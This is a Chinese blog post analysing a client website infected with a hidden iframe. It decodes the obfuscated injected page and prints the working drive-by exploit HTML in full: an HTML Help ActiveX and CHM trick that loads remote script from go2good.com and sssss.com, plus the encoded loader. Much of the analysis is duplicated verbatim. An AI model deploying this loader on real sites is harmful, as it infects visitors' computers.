客户网站被挂马的分析

打开网站,查看 源代码 ,查找<iframe 标签
就会找到在这段框架:
<iframe src="
http://www.fengyajade.com/jiaozhu.htm" name="zhu"

width="0" height="0" frameborder="0">

这就是 打开网站为什么,杀毒软件提示有木马的原因..
经检查是在index.asp 最后一行。。

上面的框架调用了本地文件jiaozhu.htm

分析jiaozhu.htm 看源代码 是经过了java unescape 函数加密了。

解密后的真实代码是:

"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

<HTML>

<BODY>

<div style="display:none">

<OBJECT id="cctv" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'>

</OBJECT>

<OBJECT id="zgds" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window"

value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write

(/"<SCRIPT language=JScript

src=///"///"/"+String.fromCharCo

de(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

</BODY>

</HTML>

"


在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件

bbs003302.gif
bbs003302.css
至于这两文件是什么,怎么做的,我也没有时间去研究了。。

通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马
网上有很多关于chm生成木马的材料,可以 百度一下的。。

大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..

这个chm已经很早的漏洞了,没想到还有人在使用

这次代码为:

<SCRIPT LANGUAGE="JavaScript">

<!--
var Words

="%3Cscript%3Edocument.write%28unescape%28%27%253CHTML%253E%250D%250A%253Chead%253E%250D%250A%253C/h

ead%253E%250D%250A%253CBODY%253E%250D%250A%253Cdiv%2520style%253D%2522display%253Anone%2522%253E%250

D%250A%253COBJECT%2520id%253D%2522f1%2522%250D%250Atype%253D%2522application/x-oleobject%2522%250D%2

50Aclassid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377-00aa003b7a11%2522%253E%250D%250A%253CPARAM%252

0name%253D%2522Command%2522%2520value%253D%2522Related%2520Topics%252C%2520MENU%2522%253E%250D%250A%

253CPARAM%2520name%253D%2522Window%2522%2520value%253D%2522%2524global_ifl%2522%253E%250D%250A%253CP

ARAM%2520name%253D%2522Item1%2522%2520value%253D%2527command%253Bfile%253A//c%253A%255CWINDOWS%255CH

elp%255Capps.chm%2527%253E%250D%250A%253C/OBJECT%253E%250D%250A%253COBJECT%2520id%253D%2522f2%2522%2

520type%253D%2522application/x-oleobject%2522%2520classid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377

-00aa003b7a11%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Command%2522%2520value%253D%2522Relate

d%2520Topics%252C%2520MENU%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Window%2522%2520value%253

D%2522%2524global_ifl%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Item1%2522%2520value%253D%2527

command%253Bjavascript%253Aeval%2528%2522document.write%2528%255C%2522%253CSCRIPT%2520language%25252

0%25253D%252520JScript%2520%2520src%253D%255C%255C%255C%2522http%3A//www.go2good.com/af/afu%252Egif%

255C%255C%255C%2522%255C%2522+String.fromCharCode%252862%2529+%255C%2522%253C/SCR%255C%2522+%255C%25

22IPT%255C%2522+String.fromCharCode%252862%2529%2529%2522%2529%2527%253E%250D%250A%253C/OBJECT%253E%

250D%250A%253C/div%253E%250D%250A%253Cscript%253E%250D%250Af1.Click%2528%2529%253BsetTimeout%2528%25

22f2.Click%2528%2529%253B%2522%252C0%2529%253B%250D%250A%253C/script%253E%250D%250A%253C/BODY%253E%2

50D%250A%253C/HTML%253E%27%29%29%3B%3C/script%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
alert(NewWords);
}
OutWord();
// -->
</SCRIPT>

<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript  src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>

"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

<HTML>

<BODY>

<div style="display:none">

<OBJECT id="cctv" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'>

</OBJECT>

<OBJECT id="zgds" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window"

value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write

(/"<SCRIPT language=JScript

src=///"///"/"+String.fromCharCo

de(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

</BODY>

</HTML>

"


在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件

bbs003302.gif
bbs003302.css
至于这两文件是什么,怎么做的,我也没有时间去研究了。。

通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马
网上有很多关于chm生成木马的材料,可以 百度一下的。。

大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..

这个chm已经很早的漏洞了,没想到还有人在使用

这次代码为:

<SCRIPT LANGUAGE="JavaScript">

<!--
var Words

="%3Cscript%3Edocument.write%28unescape%28%27%253CHTML%253E%250D%250A%253Chead%253E%250D%250A%253C/h

ead%253E%250D%250A%253CBODY%253E%250D%250A%253Cdiv%2520style%253D%2522display%253Anone%2522%253E%250

D%250A%253COBJECT%2520id%253D%2522f1%2522%250D%250Atype%253D%2522application/x-oleobject%2522%250D%2

50Aclassid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377-00aa003b7a11%2522%253E%250D%250A%253CPARAM%252

0name%253D%2522Command%2522%2520value%253D%2522Related%2520Topics%252C%2520MENU%2522%253E%250D%250A%

253CPARAM%2520name%253D%2522Window%2522%2520value%253D%2522%2524global_ifl%2522%253E%250D%250A%253CP

ARAM%2520name%253D%2522Item1%2522%2520value%253D%2527command%253Bfile%253A//c%253A%255CWINDOWS%255CH

elp%255Capps.chm%2527%253E%250D%250A%253C/OBJECT%253E%250D%250A%253COBJECT%2520id%253D%2522f2%2522%2

520type%253D%2522application/x-oleobject%2522%2520classid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377

-00aa003b7a11%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Command%2522%2520value%253D%2522Relate

d%2520Topics%252C%2520MENU%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Window%2522%2520value%253

D%2522%2524global_ifl%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Item1%2522%2520value%253D%2527

command%253Bjavascript%253Aeval%2528%2522document.write%2528%255C%2522%253CSCRIPT%2520language%25252

0%25253D%252520JScript%2520%2520src%253D%255C%255C%255C%2522http%3A//www.go2good.com/af/afu%252Egif%

255C%255C%255C%2522%255C%2522+String.fromCharCode%252862%2529+%255C%2522%253C/SCR%255C%2522+%255C%25

22IPT%255C%2522+String.fromCharCode%252862%2529%2529%2522%2529%2527%253E%250D%250A%253C/OBJECT%253E%

250D%250A%253C/div%253E%250D%250A%253Cscript%253E%250D%250Af1.Click%2528%2529%253BsetTimeout%2528%25

22f2.Click%2528%2529%253B%2522%252C0%2529%253B%250D%250A%253C/script%253E%250D%250A%253C/BODY%253E%2

50D%250A%253C/HTML%253E%27%29%29%3B%3C/script%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
alert(NewWords);
}
OutWord();
// -->
</SCRIPT>

<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript  src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值